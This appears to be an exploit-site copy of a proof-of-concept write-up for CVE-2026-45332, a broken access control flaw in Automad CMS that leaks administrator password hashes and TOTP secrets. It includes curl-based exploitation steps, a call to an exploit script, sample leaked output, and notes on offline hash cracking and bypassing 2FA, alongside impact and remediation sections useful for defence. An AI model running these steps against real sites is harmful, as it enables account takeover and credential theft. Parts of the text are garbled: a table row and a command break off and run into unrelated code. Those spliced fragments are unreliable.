Share
## https://sploitus.com/exploit?id=C21DAAE1-B419-5788-B35E-CE7E357E7438
# CVE-2026-45332 โ€” Broken Access Control in Automad CMS

Proof of concept for **CVE-2026-45332**, a Broken Access Control vulnerability in [Automad CMS](https://github.com/marcantondahmen/automad) that allows any unauthenticated attacker to dump the bcrypt password hash and TOTP secret of every administrator account through the setup endpoint, which is never disabled after initial configuration.

| Field | Value |
|---|---|
| **CVE** | [CVE-2026-45332](https://vulners.com/cve/CVE-2026-45332) |
| **GHSA** | [GHSA-xm76-r88j-vm3g](https://github.com/advisories/GHSA-xm76-r88j-vm3g) |
| **Product** | Automad CMS (composer `automad/automad`) |
| **Affected** | `>= 2.0.0-alpha.1`, `generatePHP();    // serializes every user including hashes

    return $Response->setData(array(
        'php'       => $php,                  // credential hashes returned in response
        'configDir' => dirname(UserCollection::FILE_ACCOUNTS)  // absolute path leaked
    ));
}
```

`User::__serialize()` includes the private `passwordHash` and `totpSecret` fields, so they end up embedded in the serialized output that is returned to the caller.

Full technical write-up: **[PoC.md](./PoC.md)**.

## Proof of concept

The endpoint requires a valid CSRF token, which is freely available in the source of the public login page. An automated exploit is provided in [`exploit.sh`](./exploit.sh):

```bash
./exploit.sh http://localhost:80
```

Manual reproduction:

```bash
# 1. Grab a session cookie and the CSRF token from the public login page
JAR=$(mktemp)
CSRF=$(curl -sc "$JAR" http://localhost:80/dashboard/login \
  | grep -oP '(?\" ... \"totpSecret\";s:N:\"\" ...",
    "filename": "accounts.php",
    "configDir": "/path/to/config"
  }
}
```

The bcrypt hashes can then be cracked offline (Hashcat / John). On `2.0.0-beta.27` the leaked TOTP secret bypasses two-factor authentication outright.

## Impact

An unauthenticated remote attacker can:

1. Retrieve the bcrypt hash of every administrator and crack it offline.
2. Retrieve TOTP secrets and bypass 2FA (`2.0.0-beta.27`).
3. Learn the absolute server filesystem path, aiding further attacks.

## Remediation

Update to **Automad 2.0.0-beta.28** or later, which restricts the endpoint once initial setup is complete. As a temporary mitigation, block requests to `/_api/user-collection/create-first-user` at the web server or WAF.

## References

- [CVE.org โ€” CVE-2026-45332](https://vulners.com/cve/CVE-2026-45332)
- [GitHub Advisory โ€” GHSA-xm76-r88j-vm3g](https://github.com/advisories/GHSA-xm76-r88j-vm3g)
- [Automad CMS](https://github.com/marcantondahmen/automad)
- [Broken Access Control โ€” OWASP](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)

> Disclosed responsibly. For educational and defensive purposes only.